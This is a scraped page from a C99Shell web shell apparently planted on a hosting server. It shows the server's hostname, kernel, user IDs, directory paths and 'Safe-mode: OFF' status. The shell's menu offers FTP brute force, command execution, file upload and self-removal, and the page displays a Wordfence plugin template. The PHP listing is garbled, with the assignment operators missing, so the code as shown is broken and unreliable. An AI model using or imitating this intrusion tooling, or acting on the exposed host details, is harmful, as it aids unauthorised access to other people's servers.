!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordfence/views/scanner/   drwxr-xr-x
Free 179.64 GB of 490.84 GB (36.6%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     scan-progress-element.php (1.92 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if (!defined('WORDFENCE_VERSION')) { exit; }
/**
 * Presents an individual element in the scan progress indicator.
 *
 * Expects $id, $title, and $scanner. $premiumOnly and $status may also be defined.
 *
 * @var string $id The element ID.
 * @var string $title The element title.
 * @var wfScanner $scanner The scanner state.
 * @var string $status One of the wfScanner::STATUS_ constants.
 */

if (!isset($premiumOnly)) { $premiumOnly false; }

$class '';
switch (
$status) {
    case 
wfScanner::STATUS_PENDING:
        
//No class
        
break;
    case 
wfScanner::STATUS_RUNNING:
    case 
wfScanner::STATUS_RUNNING_WARNING:
        
$class 'wf-scan-step-running';
        break;
    case 
wfScanner::STATUS_COMPLETE_SUCCESS:
        
$class 'wf-scan-step-complete-success';
        break;
    case 
wfScanner::STATUS_COMPLETE_WARNING:
        
$class 'wf-scan-step-complete-warning';
        break;
    case 
wfScanner::STATUS_PREMIUM:
        
$class 'wf-scan-step-premium';
        break;
    case 
wfScanner::STATUS_DISABLED:
        
$class 'wf-scan-step-disabled';
        break;
}

?>
<li id="<?php echo esc_attr($id); ?>" class="wf-scan-step<?php if ($class) { echo {$class}"; } ?>">
    <div class="wf-scan-step-icon">
        <?php if ($status == wfScanner::STATUS_PREMIUM): ?>
            <div class="wf-scan-step-premium"></div>
        <?php endif; ?>
        <div class="wf-scan-step-pending"></div>
        <div class="wf-scan-step-running">
            <?php
            
echo wfView::create('common/indeterminate-progress', array(
                
'size' => 50,
            ))->
render();
            
?>
        </div>
        <div class="wf-scan-step-complete-success"></div>
        <div class="wf-scan-step-complete-warning"></div>
        <div class="wf-scan-step-disabled"></div>
    </div>
    <div class="wf-scan-step-title"><?php echo esc_attr($title); ?></div>
    <?php if ($status == wfScanner::STATUS_PREMIUM): ?>
        <div class="wf-scan-step-subtitle"><a href="https://www.wordfence.com/gnl1scanUpgrade/wordfence-signup/" target="_blank" rel="noopener noreferrer"><?php _e('Upgrade''wordfence'); ?></a></div>
    <?php endif; ?>
</li>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0093 ]--